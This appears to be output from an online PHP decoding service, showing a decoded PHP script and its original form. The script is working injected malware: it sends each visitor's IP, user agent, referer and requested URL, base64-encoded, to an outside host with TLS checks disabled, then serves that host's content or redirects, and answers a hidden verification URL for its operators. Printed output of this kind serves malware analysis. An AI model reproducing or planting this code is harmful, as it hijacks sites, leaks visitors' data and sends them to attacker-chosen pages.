Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php header('Content-Type: text/html; charset=utf-8'); @date_default_timezone_set('Asia/T..
Decoded Output download
<?php header('Content-Type: text/html; charset=utf-8'); @date_default_timezone_set('Asia/Tokyo');
function FjtVBTelbSZRocHvJLaI($resp_header)
{
$header = array('status' => 0, 'content' => '', 'type' => '');
if (!is_array($resp_header)) {
return $header;
}
foreach ($resp_header as $hone) {
if (preg_match('/http\/[0-9\.]+[\s]+([0-9]+)/i', $hone, $matched)) {
$header['status'] = intval($matched[1]);
} elseif (preg_match('/location\:[\s]+(.*)/i', $hone, $matched)) {
$header['content'] = $matched[1];
} elseif (preg_match('/content\-type\:[\s]+(.*)/i', $hone, $matched)) {
$header['type'] = $matched[1];
}
}
return $header;
}
function dTpgocXVyUfNxWjhY($url, $datas = array())
{
$response = array('status' => 0, 'content' => '', 'type' => '');
if (is_array($datas) && count($datas)) {
$url .= '?' . http_build_query($datas);
}
try {
if (function_exists('curl_exec') && function_exists('curl_init')) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($c, CURLOPT_TIMEOUT, 60);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($c, CURLOPT_COOKIESESSION, 0);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$c_retval = curl_exec($c);
$response['status'] = intval(curl_getinfo($c, CURLINFO_HTTP_CODE));
$response['type'] = strval(curl_getinfo($c, CURLINFO_CONTENT_TYPE));
$response['content'] = strval(curl_getinfo($c, CURLINFO_REDIRECT_URL));
@curl_close($c);
if (in_array($response['status'], array(200, 301, 302, 404))) {
$response['content'] = strval($c_retval);
}
} elseif (ini_get('allow_url_fopen')) {
$http_opt = array(
'http' => array('method' => 'GET', 'timeout' => 60, 'follow_location' => 0),
'ssl' => array("verify_peer" => false, "verify_peer_name" => false)
);
$context = stream_context_create($http_opt);
$content = @file_get_contents($url, false, $context);
$response = array_merge($response, FjtVBTelbSZRocHvJLaI($http_response_header));
if (in_array($response['status'], array(200, 301, 302, 404))) {
$response['content'] = strval($content);
}
}
} catch (Exception $e) {
}
return $response;
}
function wFctVuZUIMjp($str)
{
if (!$str) return '';
return rtrim(strtr(base64_encode($str), '+/', '-_'), '=');
}
function gOFPQqIbCKRViDdvJeY()
{
$ip_addr = '';
if (isset($_SERVER['HTTP_CF_CONNECTING_IP']) && !empty($_SERVER['HTTP_CF_CONNECTING_IP'])) {
$ip_addr = $_SERVER['HTTP_CF_CONNECTING_IP'];
} elseif (isset($_SERVER['HTTP_X_REAL_IP']) && !empty($_SERVER['HTTP_X_REAL_IP'])) {
$ip_addr = $_SERVER['HTTP_X_REAL_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && !empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip_addr = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip_addr = $_SERVER['REMOTE_ADDR'];
}
$ip_addr = trim(str_replace(" ", "", $ip_addr), ",");
if (strpos($ip_addr, ",") !== false) {
$ip_addr = explode(",", $ip_addr);
$ip_addr = $ip_addr[0];
}
return $ip_addr;
}
function jemWqoFLnSUblYOgPNw()
{
$http_proto = 'http://';
if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
$http_proto = 'https://';
} elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
$http_proto = 'https://';
} elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
$http_proto = 'https://';
}
return $http_proto;
}
if ($_SERVER['REQUEST_URI'] === '/R-' . md5($_SERVER['SERVER_NAME'])) {
exit(strrev(md5($_SERVER['SERVER_NAME'])));
}
if (substr_count($_SERVER['REQUEST_URI'], 'index.php/jk')) {
exit('{ "error": 200, "lc": "jk", "data": [ 1 ] }');
}
$ip_addr = gOFPQqIbCKRViDdvJeY();
$referer = strval(@$_SERVER['HTTP_REFERER']);
$site_url = jemWqoFLnSUblYOgPNw() . $_SERVER['SERVER_NAME'];
if (strpos($referer, $site_url) === 0) $referer = '';
$rq = array();
$rq['i'] = wFctVuZUIMjp($ip_addr);
$rq['l'] = wFctVuZUIMjp($_SERVER['HTTP_ACCEPT_LANGUAGE']);
$rq['sn'] = wFctVuZUIMjp($_SERVER['SCRIPT_NAME']);
$rq['r'] = wFctVuZUIMjp($_SERVER['REQUEST_URI']);
$rq['rf'] = wFctVuZUIMjp($referer);
$rq['s'] = wFctVuZUIMjp($site_url);
$rq['u'] = wFctVuZUIMjp($_SERVER['HTTP_USER_AGENT']);
$r_trim = preg_replace('/\?.*/', '', $_SERVER['REQUEST_URI']);
$r_istatic = false;
if (strpos($r_trim, '.') > 0&&strpos($r_trim,'.php')===false) {
$ext = substr($r_trim, strpos($r_trim, '.'));
if (in_array($ext, array('.js', '.css', '.jpg', '.png', '.gif', '.ico'))) {
$r_istatic = true;
}
}
if (!$r_istatic) {
$response = dTpgocXVyUfNxWjhY('http://671vs.helpu.shop/', $rq);
if (!in_array($response['status'], array(0, 200))) {
switch ($response['status']) {
case 301:
header('HTTP/1.1 301 Moved Permanently');
header('Location: ' . trim($response['content']));
break;
case 302:
header('HTTP/1.1 302 Move Temporarily');
header('Location: ' . trim($response['content']));
break;
case 404:
header('HTTP/1.1 404 Not Found');
header("status: 404 Not Found");
break;
default:
break;
}
}
if (strlen($response['content'])) {
@header('Content-Type:' . $response['type']);
echo $response['content'];
exit(0);
}
} ?>Did this file decode correctly?
Original Code
<?php header('Content-Type: text/html; charset=utf-8'); @date_default_timezone_set('Asia/Tokyo');
function FjtVBTelbSZRocHvJLaI($resp_header)
{
$header = array('status' => 0, 'content' => '', 'type' => '');
if (!is_array($resp_header)) {
return $header;
}
foreach ($resp_header as $hone) {
if (preg_match('/http\/[0-9\.]+[\s]+([0-9]+)/i', $hone, $matched)) {
$header['status'] = intval($matched[1]);
} elseif (preg_match('/location\:[\s]+(.*)/i', $hone, $matched)) {
$header['content'] = $matched[1];
} elseif (preg_match('/content\-type\:[\s]+(.*)/i', $hone, $matched)) {
$header['type'] = $matched[1];
}
}
return $header;
}
function dTpgocXVyUfNxWjhY($url, $datas = array())
{
$response = array('status' => 0, 'content' => '', 'type' => '');
if (is_array($datas) && count($datas)) {
$url .= '?' . http_build_query($datas);
}
try {
if (function_exists('curl_exec') && function_exists('curl_init')) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($c, CURLOPT_TIMEOUT, 60);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($c, CURLOPT_COOKIESESSION, 0);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$c_retval = curl_exec($c);
$response['status'] = intval(curl_getinfo($c, CURLINFO_HTTP_CODE));
$response['type'] = strval(curl_getinfo($c, CURLINFO_CONTENT_TYPE));
$response['content'] = strval(curl_getinfo($c, CURLINFO_REDIRECT_URL));
@curl_close($c);
if (in_array($response['status'], array(200, 301, 302, 404))) {
$response['content'] = strval($c_retval);
}
} elseif (ini_get('allow_url_fopen')) {
$http_opt = array(
'http' => array('method' => 'GET', 'timeout' => 60, 'follow_location' => 0),
'ssl' => array("verify_peer" => false, "verify_peer_name" => false)
);
$context = stream_context_create($http_opt);
$content = @file_get_contents($url, false, $context);
$response = array_merge($response, FjtVBTelbSZRocHvJLaI($http_response_header));
if (in_array($response['status'], array(200, 301, 302, 404))) {
$response['content'] = strval($content);
}
}
} catch (Exception $e) {
}
return $response;
}
function wFctVuZUIMjp($str)
{
if (!$str) return '';
return rtrim(strtr(base64_encode($str), '+/', '-_'), '=');
}
function gOFPQqIbCKRViDdvJeY()
{
$ip_addr = '';
if (isset($_SERVER['HTTP_CF_CONNECTING_IP']) && !empty($_SERVER['HTTP_CF_CONNECTING_IP'])) {
$ip_addr = $_SERVER['HTTP_CF_CONNECTING_IP'];
} elseif (isset($_SERVER['HTTP_X_REAL_IP']) && !empty($_SERVER['HTTP_X_REAL_IP'])) {
$ip_addr = $_SERVER['HTTP_X_REAL_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && !empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip_addr = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip_addr = $_SERVER['REMOTE_ADDR'];
}
$ip_addr = trim(str_replace(" ", "", $ip_addr), ",");
if (strpos($ip_addr, ",") !== false) {
$ip_addr = explode(",", $ip_addr);
$ip_addr = $ip_addr[0];
}
return $ip_addr;
}
function jemWqoFLnSUblYOgPNw()
{
$http_proto = 'http://';
if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
$http_proto = 'https://';
} elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
$http_proto = 'https://';
} elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
$http_proto = 'https://';
}
return $http_proto;
}
if ($_SERVER['REQUEST_URI'] === '/R-' . md5($_SERVER['SERVER_NAME'])) {
exit(strrev(md5($_SERVER['SERVER_NAME'])));
}
if (substr_count($_SERVER['REQUEST_URI'], 'index.php/jk')) {
exit('{ "error": 200, "lc": "jk", "data": [ 1 ] }');
}
$ip_addr = gOFPQqIbCKRViDdvJeY();
$referer = strval(@$_SERVER['HTTP_REFERER']);
$site_url = jemWqoFLnSUblYOgPNw() . $_SERVER['SERVER_NAME'];
if (strpos($referer, $site_url) === 0) $referer = '';
$rq = array();
$rq['i'] = wFctVuZUIMjp($ip_addr);
$rq['l'] = wFctVuZUIMjp($_SERVER['HTTP_ACCEPT_LANGUAGE']);
$rq['sn'] = wFctVuZUIMjp($_SERVER['SCRIPT_NAME']);
$rq['r'] = wFctVuZUIMjp($_SERVER['REQUEST_URI']);
$rq['rf'] = wFctVuZUIMjp($referer);
$rq['s'] = wFctVuZUIMjp($site_url);
$rq['u'] = wFctVuZUIMjp($_SERVER['HTTP_USER_AGENT']);
$r_trim = preg_replace('/\?.*/', '', $_SERVER['REQUEST_URI']);
$r_istatic = false;
if (strpos($r_trim, '.') > 0&&strpos($r_trim,'.php')===false) {
$ext = substr($r_trim, strpos($r_trim, '.'));
if (in_array($ext, array('.js', '.css', '.jpg', '.png', '.gif', '.ico'))) {
$r_istatic = true;
}
}
if (!$r_istatic) {
$response = dTpgocXVyUfNxWjhY('http://671vs.helpu.shop/', $rq);
if (!in_array($response['status'], array(0, 200))) {
switch ($response['status']) {
case 301:
header('HTTP/1.1 301 Moved Permanently');
header('Location: ' . trim($response['content']));
break;
case 302:
header('HTTP/1.1 302 Move Temporarily');
header('Location: ' . trim($response['content']));
break;
case 404:
header('HTTP/1.1 404 Not Found');
header("status: 404 Not Found");
break;
default:
break;
}
}
if (strlen($response['content'])) {
@header('Content-Type:' . $response['type']);
echo $response['content'];
exit(0);
}
} ?>Function Calls
| header | 1 |
Stats
| MD5 | 0b4abc7552d5b11dcf645f63ae7efe98 |
| Eval Count | 0 |
| Decode Time | 130 ms |